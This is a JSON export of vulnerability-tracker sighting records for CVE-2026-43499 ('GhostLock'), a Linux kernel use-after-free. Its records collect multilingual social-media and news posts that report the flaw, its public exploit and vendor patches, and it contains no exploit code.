{"uuid": "8679f940-80d3-4311-887e-3da7441ccb8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3mq4itynutb2u", "content": "GhostLock (CVE-2026-43499) is a Linux use-after-free that allows any logged-in user to gain full root control on unpatched systems.\n", "creation_timestamp": "2026-07-08T06:34:44.727323Z"}, {"uuid": "a338ad5d-d731-4be1-bc55-9bae3baa8b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://infosec.exchange/users/tomcat/statuses/116883158678172054", "content": "\ud83d\uded1 A newly found 15-year-old #Linux kernel flaw, GhostLock (CVE-2026-43499), could let any logged-in user gain root on unpatched distributions.\nA working exploit code is now public, and it escaped containers in tests.\nRead details here: https://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "creation_timestamp": "2026-07-08T07:24:23.613614Z"}, {"uuid": "905f6fcc-93e9-4f11-966c-76ffe04d1a81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mq4mc3475y27", "content": "15\u5e74\u9593\u5b58\u5728\u3057\u305fLinux\u30ab\u30fc\u30cd\u30eb\u306e\u300cGhostLock\u300d\u8106\u5f31\u6027\u3001root\u6a29\u9650\u596a\u53d6\u3068\u30b3\u30f3\u30c6\u30ca\u30a8\u30b9\u30b1\u30fc\u30d7\u3092\u53ef\u80fd\u306b\n\nNebula Security\u306e\u7814\u7a76\u8005\u3089\u304c\u3001Linux\u30ab\u30fc\u30cd\u30eb\u306b\u5b58\u5728\u3059\u308b\u91cd\u5927\u306a\u8106\u5f31\u6027\u300cGhostLock\u300d\uff08CVE-2026-43499\uff09\u3092\u516c\u8868\u3057\u307e\u3057\u305f\u3002 \u3053\u306e\u8106\u5f31\u6027\u306f15\u5e74\u9593\u306b\u308f\u305f\u308a\u5b58\u5728\u3057\u7d9a\u3051\u3066\u304a\u308a\u3001\u307b\u307c\u3059\u3079\u3066\u306eLinux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u304a\u3044\u3066\u78ba\u5b9f\u306a\u6a29\u9650\u6607\u683c\u3068\u30b3\u30f3\u30c6\u30ca\u30a8\u30b9\u30b1\u30fc\u30d7\u3092\u53ef\u80fd\u306b\u3057\u307e\u3059\u3002\u554f\u984c\u306f2011...", "creation_timestamp": "2026-07-08T07:36:17.608285Z"}, {"uuid": "e1a55179-ba6b-427b-be6b-2a28dc34a4f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43499", "type": "seen", "source": "https://bsky.app/profile/blindthoughts.bsky.social/post/3mq4okzprzt27", "content": "GhostLock: 15-Year Linux Kernel Flaw Grants Root to Any Local User\n\nhttps://blindthoughts.com/ghostlock-linux-kernel-root-escape-cve-2026-43499\n\n#linux #kernel #privilegeescalation #containerescape #cve", "creation_timestamp": "2026-07-08T08:17:05.391444Z"}, {"uuid": "6df95cc5-b3b8-4319-9f6a-e5203756ce52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/newssecia.bsky.social/post/3mq4oybosik22", "content": "\ud83e\udd16 CVE-2026-43499 (GhostLock) : 15-year-old Linux kernel flaw. Lets any local user gain full root access &amp; escape containers on all major distros. No special privileges needed.\\n\\nhttps://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "creation_timestamp": "2026-07-08T08:24:30.147420Z"}, {"uuid": "550406cf-d37b-4825-ab1b-032013b645be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/vritrasecnews.bsky.social/post/3mq4uhqrxzb2x", "content": "Researchers at Nebula Security have disclosed GhostLock (CVE-2026-43499), a 15-year-old Linux kernel flaw that lets any logged-in user take full root control of a machine that has not bee...\n\n\ud83d\udd17 https://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "creation_timestamp": "2026-07-08T10:02:37.913142Z"}, {"uuid": "c25bf3b0-61b2-47c6-89fd-bcd749764db0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "content": "Researchers at&nbsp;Nebula Security&nbsp;have disclosed GhostLock (CVE-2026-43499), a 15-year-old Linux kernel flaw that lets any logged-in user take full&nbsp;root&nbsp;control of a machine that has not been patched.\n\nThe vulnerable code has shipped by default in essentially every mainstream distribution since 2011. The flaw needs no special permission, no unusual settings, and no network", "creation_timestamp": "2026-07-08T10:00:59.317706Z"}, {"uuid": "a7ce0719-5327-4e20-83ca-b52acae01471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43499", "type": "seen", "source": "https://bsky.app/profile/etairos-ai.bsky.social/post/3mq5byvighn2o", "content": "GhostLock (CVE-2026-43499): a 15-year-old Linux kernel flaw hands any local user root in 5 seconds. Patch ICS, OT, and container hosts now. #ThreatIntel #ICS #CyberSecurity\nhttps://threat-intelligence.redeyesecurity.com/blog/ghostlock-cve-2026-43499-linux-root-container-escape-2026", "creation_timestamp": "2026-07-08T14:04:52.557829Z"}, {"uuid": "ca3e89fe-6bff-45bd-a1ea-019a476d0b50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/grsecurity.bsky.social/post/3mq5vhkasy22p", "content": "If you're just now hearing about GhostLock and looking to fix it, make sure you don't introduce two unpriv-reachable DoSes associated with its fixes. The fix the Linux CNA lists for CVE-2026-43499 introduces a NULL deref, which caused CVE-2026-53166 to be issued.", "creation_timestamp": "2026-07-08T19:53:22.254102Z"}, {"uuid": "1c35ff80-d367-4f47-81d1-7e76468493c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/116886323468147785", "content": "Here's your weekly batch of Linux local privilege escalation vulnerabilities:\nCVE-2026-43499 \"GhostLock\"https://nebusec.ai/research/ionstack-part-2/\nCVE-2026-46242 \"Bad Epoll\"https://github.com/J-jaeyoung/bad-epoll\nEnjoy! \u270c\ufe0f", "creation_timestamp": "2026-07-08T20:49:15.286249Z"}, {"uuid": "9c0b785e-80c8-408e-a586-daf4b7c1fc39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/jschauma.mstdn.social.ap.brid.gy/post/3mq5ym2fuptm2", "content": "Here's your weekly batch of Linux local privilege escalation vulnerabilities:\n\nCVE-2026-43499 \"GhostLock\"\nhttps://nebusec.ai/research/ionstack-part-2/\n\nCVE-2026-46242 \"Bad Epoll\"\nhttps://github.com/J-jaeyoung/bad-epoll\n\nEnjoy! \u270c\ufe0f", "creation_timestamp": "2026-07-08T20:49:19.881415Z"}, {"uuid": "b5387688-09fc-496f-88be-131f5bcb49c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mq62uouavk24", "content": "Linux: GhostLock / CVE-2026-43499 / stack-UAF and LPE in kernels 2.6.39 till 7.1", "creation_timestamp": "2026-07-08T21:29:54.368391Z"}, {"uuid": "8ed55117-612f-46f2-897d-7823cc212890", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43499", "type": "seen", "source": "https://bsky.app/profile/newssecia.bsky.social/post/3mq6ahrcief2p", "content": "\ud83d\udd0d Nouvel article : CVE-2026-43499 (GhostLock)\n\nStack-UAF 15 ans dans le rtmutex Linux, d\u00e9couvert par l'IA VEGA. LPE + container escape \u00e0 97%, 92 337 $ de bounty. Aucun privil\u00e8ge requis.\n\n\ud83d\udcdd https://madpowah.github.io/2026/07/09/cve-2026-43499-ghostlock-ionstack.html", "creation_timestamp": "2026-07-08T23:10:03.591529Z"}, {"uuid": "f42637bd-7418-4dd0-a8b6-45f76624c2c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mq6ee6nzok2a", "content": "15-Year-Old GhostLock Flaw Enables Root and Container Escape on Most Linux Distros\n\nResearchers at\u00a0Nebula Security\u00a0have disclosed GhostLock (CVE-2026-43499), a 15-year-old Linux kernel flaw that lets any logged-in user take full\u00a0root\u00a0control of a machine that has not been patched.\u2026\n#hackernews #news", "creation_timestamp": "2026-07-09T00:19:38.077322Z"}, {"uuid": "43d87665-1d4a-47a8-9c36-89d1c08f00ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "content": "Researchers at&nbsp;Nebula Security&nbsp;have disclosed GhostLock (CVE-2026-43499), a 15-year-old Linux kernel flaw that lets any logged-in user take full&nbsp;root&nbsp;control of a machine that has not been patched.\n\nThe vulnerable code has shipped by default in essentially every mainstream distribution since 2011. The flaw needs no special permission, no unusual settings, and no network", "creation_timestamp": "2026-07-09T01:00:52.689575Z"}, {"uuid": "eac51771-3446-4c91-8a70-016ee0c98580", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260702", "content": "", "creation_timestamp": "2026-07-09T01:18:33.495668Z"}, {"uuid": "577bdb34-9c9d-4935-a70c-8899b769c74a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mq6sef2uxe2t", "content": "Re: Linux: GhostLock / CVE-2026-43499 / stack-UAF and LPE in kernels 2.6.39 till 7.1", "creation_timestamp": "2026-07-09T04:30:17.098846Z"}, {"uuid": "9dc8528f-3999-46c8-b8c0-7d7613b2b0cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43499", "type": "seen", "source": "https://bsky.app/profile/thecybersecguru.com/post/3mq6tjis2lm2z", "content": "GhostLock (CVE-2026-43499): a fifteen-year-old rtmutex bug just handed root to anyone with a\u00a0shell\n\nGhostLock (CVE-2026-43499) is a 15-year rtmutex use-after-free giving root to any\u2026\n\nhttps://thecybersecguru.com/news/ghostlock-cve-2026-43499-linux-kernel-0day/?utm_source=bluesky&amp;utm_medium=social", "creation_timestamp": "2026-07-09T04:51:06.780391Z"}, {"uuid": "9a4cfb8e-534c-4446-bd82-2f1000e182ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/newsarea.bsky.social/post/3mq6twcfvpl2m", "content": "Public Exploit Turns 15-Year Linux Kernel Flaw Into 5-Second Root\u00a0Attack\n\nLinux kernel privilege escalation vulnerability GhostLock (CVE-2026-43499) has lurked undetected in every major distribution since 2011. A public exploit now lets any logged-in user gain full root in roughly five seconds, no\u2026", "creation_timestamp": "2026-07-09T04:58:12.601047Z"}, {"uuid": "a5ec23e5-43c8-4c81-a7ad-c79f6d120563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/dacbarbos.mastodon.social.ap.brid.gy/post/3mq76t6jv3fm2", "content": "MT @nebusecurity@x.com\nGhostLock (CVE-2026-43499) is a 15yr old kernel 0-day we used in IonStack full chain exploit. #infosec\nhttps://github.com/NebuSec/CyberMeowfia/blob/main/IonStack/CVE-2026-43499/poc/poc.c", "creation_timestamp": "2026-07-09T08:13:23.871945Z"}, {"uuid": "3274fc87-5e50-4612-ad1b-743c721f3b12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/dacbarbos.eurosky.social/post/3mq76xfejd223", "content": "MT @nebusecurity@x.com \nGhostLock (CVE-2026-43499) is a 15yr old kernel 0-day we used in IonStack full chain exploit. #infosec \ngithub.com/NebuSec/Cybe...", "creation_timestamp": "2026-07-09T08:15:40.378020Z"}, {"uuid": "8e5568db-a4f4-47ea-9a10-fe4dd3731cbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3mq7ibnyxfs2r", "content": "GhostLock (CVE-2026-43499) is a Linux kernel flaw enabling unprivileged local users to gain root control in about five seconds on unpatched systems.\n", "creation_timestamp": "2026-07-09T11:02:28.373338Z"}, {"uuid": "f7225a3f-a91a-4ca4-899a-57827b05ecd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3mq7lqx7dei2b", "content": "GhostLock (CVE-2026-43499) is a long-lived Linux use-after-free flaw enabling local root escalation and container escape.\n", "creation_timestamp": "2026-07-09T12:04:42.595013Z"}, {"uuid": "58e917aa-dc78-4ac5-81c5-19b4f873e438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mq7outfyec2i", "content": "Linux kernel flaw GhostLock (CVE-2026-43499) went undiscovered for 15 years, enabling local root and container escape. Nebula Security earned $92,337 from Google for its exploit proof. #GhostLock #kernelCTF #Linux", "creation_timestamp": "2026-07-09T13:00:33.670463Z"}, {"uuid": "625868f1-77f6-4ef5-80fe-3fcc3cfefdce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/it-connect.bsky.social/post/3mq7rf3plwp2v", "content": "GhostLock (CVE-2026-43499) : 15 ans dans le noyau Linux, exploit fiable \u00e0 97 %, root en 5 secondes.\n\nLe point complet \ud83d\udc47\nwww.it-connect.fr/ghostlock-fa...\n\n#linux #infosec", "creation_timestamp": "2026-07-09T13:45:27.352475Z"}, {"uuid": "8877860f-dc73-4fb8-b4e7-c4d916a9d64b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/linuxiac.bsky.social/post/3mq7ztecd2s27", "content": "CVE-2026-43499, dubbed GhostLock by Nebula Security, exposes a long-standing Linux kernel futex bug that can lead to local root access.\nlinuxiac.com/15-year-old-...\n\n#Linux #Kernel #Security #OpenSource", "creation_timestamp": "2026-07-09T16:16:38.576893Z"}, {"uuid": "cef0d4c6-2cc9-4c91-b095-26fb1124f43a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mqa5eurpyj2u", "content": "Re: Linux: GhostLock / CVE-2026-43499 / stack-UAF and LPE in kernels 2.6.39 till 7.1", "creation_timestamp": "2026-07-09T17:20:06.594136Z"}, {"uuid": "8ef3737c-df6a-47ed-95ac-cc4352066a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mqa5iguh3o2b", "content": "We are shipping patched kernels for GhostLock (CVE-2026-43499), a new Linux kernel local-privilege-escalation flaw.\n\nEvery supported AlmaLinux release is affected.\n\nHelp us with testing and learn more: https://almalinux.org/blog/2026-07-09-ghostlock/?utm_medium=social&amp;utm_source=bluesky", "creation_timestamp": "2026-07-09T17:22:06.926829Z"}, {"uuid": "89ef24f5-113b-413f-824f-1886283807b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/adjordan.bsky.social/post/3mqagqmq7es2z", "content": "\"Researchers at\u00a0Nebula Security\u00a0have disclosed GhostLock (CVE-2026-43499), a 15-year-old Linux kernel flaw that lets any logged-in user take full\u00a0root\u00a0control of a machine that has not been patched.\"\n thehackernews.com/2026/07/15-y....", "creation_timestamp": "2026-07-09T20:07:43.793040Z"}, {"uuid": "5c6ed8eb-11da-4208-bde2-59c0486069e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/suriq.io/post/3mqagvuhg7l2d", "content": "\ud83d\udd34 EXPLOITED\n\nGhostLock (CVE-2026-43499): a 15-year-old Linux kernel bug gives any local user root and breaks out of containers to the host.\n\nEvery major distro since 2011 is affected; a working exploit is public.\n\nPatch multi-tenant hosts first.", "creation_timestamp": "2026-07-09T20:10:42.329097Z"}, {"uuid": "eb635b8d-fcdb-4076-ae3e-a3b9f4849a3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/stevensaus.com/post/3mqaysghdws2k", "content": "15-Year-Old Linux Kernel GhostLock Flaw Lets Local Users Gain Root  \n\nCVE-2026-43499, dubbed GhostLock by Nebula Security, exposes a long-standing Linux kernel futex bug that can lead to local root access.  \n\n  \n\nhttps://s.faithcollapsing.com/wt27a", "creation_timestamp": "2026-07-10T01:30:50.493891Z"}, {"uuid": "1c5808c5-e7a6-416b-91df-b73acd5c0cd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/StevenSaus.faithcollapsing.com.ap.brid.gy/post/3mqayt3ktboq2", "content": "15-Year-Old Linux Kernel GhostLock Flaw Lets Local Users Gain Root\n\nCVE-2026-43499, dubbed GhostLock by Nebula Security, exposes a long-standing Linux kernel futex bug that can lead to local root access.\n\n#kernel #linux-&amp;-open-source-news #software [\u2026] \n\n[Original post on faithcollapsing.com]", "creation_timestamp": "2026-07-10T01:31:14.504320Z"}, {"uuid": "5e87cbad-f38e-46c6-989d-25cd80a43975", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/bitralix.com/post/3mqboklj3kk2a", "content": "CVE-2026-43499: ojo al host \ud83e\udde9\n\nEn contenedores, no basta con mirar la imagen: el kernel del host sostiene el aislamiento. Revisar versi\u00f3n, privilegios y reinicios pendientes puede evitar sorpresas. \ud83d\udd10\n\nConsulta el contenido completo aqu\u00ed: \ud83d\udc47\nbitralix.es/cww80\n\n#Linux #Seguridad", "creation_timestamp": "2026-07-10T08:00:09.674894Z"}, {"uuid": "3f716f1c-9a5d-4069-8dd6-3456bf854529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/lalgorisme.bsky.social/post/3mqbosj5xcc27", "content": "GhostLock (CVE-2026-43499): una vulnerabilitat que porta 15 anys al kernel de Linux i que permet a qualsevol usuari amb acc\u00e9s local convertir-se en root sense necessitar permisos especials. Tamb\u00e9 permet escapar de contenidors. Solucionat al kernel 7.1.\n thehackernews.com/2026/07/15-y...", "creation_timestamp": "2026-07-10T08:04:38.646703Z"}, {"uuid": "96012377-150c-4582-896e-c389a6dbd970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/tugate.ch/post/3mqbslnru2i2v", "content": "Falha GhostLock no Linux permite controlo total de sistemas desatualizados. Investigadores da Nebula Security divulgaram a vulnerabilidade GhostLock (CVE-2026-43499), que afeta a grande maioria das distribui\u00e7\u00f5es do Linux desde 2011. \ud83d\udea8 \n\n#controlo #falha #linux ", "creation_timestamp": "2026-07-10T09:12:20.404590Z"}, {"uuid": "3c6041d9-5f6a-4061-add9-345ebff06efc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/radwebhosting.com/post/3mqcvska6t42f", "content": "GhostLock (CVE-2026-43499): What It Is and Why We Patched All Managed Servers \n\nThis article provides an overview of recently patched #security vulnerability, Ghostlock (CVE-2026-43499).\nGhostLock (CVE-2026-43499): What It Is, Why It ...\nContinued \ud83d\udc49 #criticalvulnerability #privilegeescalation", "creation_timestamp": "2026-07-10T19:42:32.699041Z"}, {"uuid": "af5a7222-9fe5-4a3e-991f-75091f0e8158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/radwebhosting.com/post/3mqcvysolpt2l", "content": "GhostLock (CVE-2026-43499): What It Is and Why We Patched All Managed Servers \n\nThis article provides an overview of recently patched #security vulnerability, Ghostlock (CVE-2026-43499).\nGhostLock (CVE-2026-43499): What It Is, Why It ...\nContinued \ud83d\udc49 #privilegeescalation #criticalvulnerability", "creation_timestamp": "2026-07-10T19:46:02.845313Z"}, {"uuid": "da9aec49-ea02-42e5-bd4f-5b746ea54b52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/radwebhosting.com/post/3mqczxrpxxo2g", "content": "Updated Post: GhostLock (CVE-2026-43499): What It Is and Why We Patched All Managed Servers\n#ServiceAnnouncement", "creation_timestamp": "2026-07-10T20:57:03.246915Z"}, {"uuid": "1deabeb4-ef3f-470a-a01d-e3374409b793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/bestofhn.bsky.social/post/3mqd34oxqpb2s", "content": "GhostLock, a Linux kernel stack-UAF (CVE-2026-43499) since 2011.\n\nSubmit to upvote on HN\nhttps://news.ycombinator.com/submitlink?u=https%3A%2F%2Fnebusec.ai%2Fresearch%2Fionstack-part-2%2F&amp;t=GhostLock%2C%20a%20stack-UAF%20that%20has%20existed%20in%20ALL%20Linux%20distributions%20for%2015%20years", "creation_timestamp": "2026-07-10T21:17:42.076963Z"}, {"uuid": "d7762880-3a6c-495e-8282-39c966c14a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43499", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mqezu7be4c2p", "content": "\ud83d\udce2 GhostLock (CVE-2026-43499) : stack-UAF dans le noyau Linux depuis 15 ans, exploit stable \u00e0 97%\n\ud83d\udcdd ## \ud83d\udd0d Contexte\n\nPubli\u00e9 le 7 juillet 2026 p\u2026\nhttps://cyberveille.ch/posts/2026-07-11-ghostlock-cve-2026-43499-stack-uaf-dans-le-noyau-linux-depuis-15-ans-exploit-stable-a-97/ #CVE_2026_43499 #Cyberveille", "creation_timestamp": "2026-07-11T16:00:22.183632Z"}, {"uuid": "424781fb-7f19-44f1-ad97-bd8a762e6a32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/kevinhermes.bsky.social/post/3mqgod3blsz2p", "content": "A 15-year-old Linux kernel flaw just went public \u2014 any local user gets root, and it escapes Docker containers. GhostLock (CVE-2026-43499) is live.", "creation_timestamp": "2026-07-12T07:39:15.855898Z"}, {"uuid": "5ea4ddd6-4599-47f3-9899-42ff1cf61b51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/msolde.bsky.social/post/3mqgvyakllc2f", "content": "\u201cLocal\u201d does not mean \u201clow risk.\u201d GhostLock (CVE-2026-43499) lets an unprivileged Linux process gain root. On shared hosts, containers or CI runners, one small breach can become full system compromise. Patch, reboot, and verify the running kernel. #Linux #CyberSecurity", "creation_timestamp": "2026-07-12T09:56:23.114726Z"}, {"uuid": "f5c2b86e-86f7-4df0-9431-fa829e75d368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/iberianm.bsky.social/post/3mqh4vxp4ib2p", "content": "Linux kernel GhostLock (CVE-2026-43499) can let logged-in users gain full root and escape containers on unpatched systems. Patch immediately and verify kernel version\u2026 #Cybersecurity #Vulnerability #CloudSecurity\n\nSource: https://thehackernews.com/2026/07/15-year-old-ghostlock-flaw-enables-root.html", "creation_timestamp": "2026-07-12T12:00:22.424394Z"}, {"uuid": "af093290-61a7-49bb-a022-d085718ac43e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3mqiuzqatk222", "content": "GhostLock (CVE-2026-43499) is a 15-year-old Linux kernel vulnerability involving a stack-based use-after-free in the rtmutex subsystem. The flaw allows unprivileged local attackers to achieve privilege escalation and container escape. Users should update to the latest LTS.", "creation_timestamp": "2026-07-13T04:44:38.622961Z"}, {"uuid": "e0e03a25-1525-4b96-b935-2de70aee3bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/thecybersidekick.bsky.social/post/3mqjptg4naj2h", "content": "GhostLock (CVE-2026-43499): A critical Linux kernel privilege escalation that bypasses Kubernetes security controls entirely. Multi-tenant clusters at risk. Here's what you need to know \ud83e\uddf5", "creation_timestamp": "2026-07-13T12:44:17.090742Z"}, {"uuid": "fa64266e-2cde-4a9e-a540-611501bc11f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": 